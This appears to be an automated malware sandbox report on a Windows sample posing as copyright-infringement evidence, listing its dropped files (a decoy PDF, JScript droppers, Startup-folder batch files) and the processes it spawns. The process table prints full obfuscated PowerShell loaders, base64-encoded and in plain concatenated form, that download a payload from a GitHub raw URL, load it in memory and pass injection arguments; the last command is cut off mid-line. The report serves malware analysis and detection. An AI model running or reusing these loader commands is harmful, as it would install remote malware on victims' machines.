Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
copyright_infringement_evidence_1.exe
|
PE32+ executable (GUI) x86-64, for MS Windows
|
initial sample
|
||
C:\Users\Public\Documents\2p_bee.js
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\Users\Public\Documents\2x_bee.js
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_2p_bee.js.bat
|
DOS batch file, ASCII text
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_2x_bee.js.bat
|
DOS batch file, ASCII text
|
dropped
|
||
C:\Users\Public\Documents\Benefits-_JD-_Photo-_Video-_UNQILO-_Q4-_2024_Benefits-_JD-_Photo.pdf
|
PDF document, version 1.7, 3 pages
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\c8e50c85-0c43-4cd7-991e-55e29716a4dd.tmp
|
JSON data
|
modified
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-241008001507Z-161.bmp
|
PC bitmap, Windows 3.x format, 117 x -152 x 32, cbSize 71190, bits offset 54
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
|
SQLite 3.x database, last written using SQLite version 3040000, file counter 4, database pages 14, cookie 0x5, schema 4, UTF-8,
version-valid-for 4
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal
|
SQLite Rollback Journal
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
|
Certificate, Version=3
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents
|
SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8,
version-valid-for 25
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal
|
SQLite Rollback Journal
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\MSIabffc.LOG
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3g31dsrb.ysj.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4kwil4bl.ljd.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bjw4xxbr.a05.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_br2saiv3.kcx.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_csuydurb.cmg.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d3ubwza3.rbw.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dror5mzj.hff.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f10hfybx.jpb.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_giu2oqii.aj5.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iso3yttq.z2u.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iufrdab2.bq5.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_joajcspy.h0w.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l3kcuqgh.0le.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nbklbt2t.olx.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nfiyh2sf.tgd.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_og2pegqo.yb1.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q1pxd2wv.r12.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qcdoznra.f1u.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qifqunvw.utq.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rf2ffbkq.2ht.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rq02yjah.x5u.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sd4hmuvs.xax.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sjovffm4.1sb.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wbnty4i5.d1z.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wtdwkjbr.er5.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x22xuseb.rxa.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x5evwcdl.xfh.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xwb0gmve.cnf.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xxdnudhi.0jb.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yq3pbw5n.c32.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\acrobat_sbx\A91wn1q38_ksqaf6_35k.tmp
|
Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\acrobat_sbx\A9h51nf7_ksqaf5_35k.tmp
|
Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-10-07 20-15-05-350.log
|
ASCII text, with very long lines (393)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
|
ASCII text, with very long lines (393), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\acrocef_low\212e41a9-8ff6-4bcc-899f-1e6281ace0eb.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\acrocef_low\5cd0f453-9633-47bf-a7ef-39414146bc84.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\acrocef_low\c7f821e4-e1de-4fde-8cf2-551cf9ed9bae.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\acrocef_low\e2fb0c47-730a-4a0a-9b65-453e10b6385b.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata
|
ISO-8859 text, with very long lines (3486), with CRLF, CR line terminators
|
dropped
|
There are 77 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\copyright_infringement_evidence_1.exe
|
"C:\Users\user\Desktop\copyright_infringement_evidence_1.exe"
|
||
C:\Windows\System32\cmd.exe
|
"cmd" /C start C:\Users\Public\Documents\Benefits-_JD-_Photo-_Video-_UNQILO-_Q4-_2024_Benefits-_JD-_Photo.pdf
|
||
C:\Windows\System32\wscript.exe
|
"wscript.exe" C:\Users\Public\Documents\2p_bee.js
|
||
C:\Windows\System32\cmd.exe
|
"cmd" /C echo %username%
|
||
C:\Windows\System32\wscript.exe
|
"wscript.exe" C:\Users\Public\Documents\2x_bee.js
|
||
C:\Windows\System32\cmd.exe
|
"cmd" /C echo %username%
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2x_bee.js',
'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
|
||
C:\Windows\System32\PING.EXE
|
ping 127.0.0.1 -n 10
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2p_bee.js',
'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
|
||
C:\Windows\System32\PING.EXE
|
ping 127.0.0.1 -n 10
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_2p_bee.js.bat"
"
|
||
C:\Windows\System32\wscript.exe
|
wscript.exe "C:\Users\Public\Documents\2p_bee.js"
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start
Menu\Programs\Startup\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
sj.JJC.js')')
|
||
C:\Windows\System32\PING.EXE
|
ping 127.0.0.1 -n 10
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2x_bee.js', 'C:\Users\' + [Environment]::UserName +
''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2p_bee.js', 'C:\Users\' + [Environment]::UserName +
''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsAJwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLACcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwArACcAZAAnACsAJwBlAHMAJwArACcAYQB0ACcAKwAnAGkAdgBhAGQAbwB7ADMAfQAsACcAKwAnAHsAMwB9ACcAKwAnAHsAMwB9ACkAJwArACcAewAnACsAJwAwAH0AJwArACcAOwAnACsAJwAgAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ARQB4ACcAKwAnAHAAJwArACcAcgBlAHMAcwBpAG8AbgAgAHsAMgAnACsAJwB9AGMAbwBtACcAKwAnAG0AJwArACcAYQBuACcAKwAnAGQAJwApACAALQBGACAAWwBjAEgAYQByAF0AMwA5ACwAWwBjAEgAYQByAF0AOQAyACwAWwBjAEgAYQByAF0AMwA2ACwAWwBjAEgAYQByAF0AMwA0ACkAIAApAA==';$OWjuxD
= [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden
-executionpolicy bypass -NoProfile -command $OWjuxD
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD
= [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden
-executionpolicy bypass -NoProfile -command $OWjuxD
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+';
'+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url);
'+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly
'+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+',
{3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+'
{3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34)
)"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
"(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s;
CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent
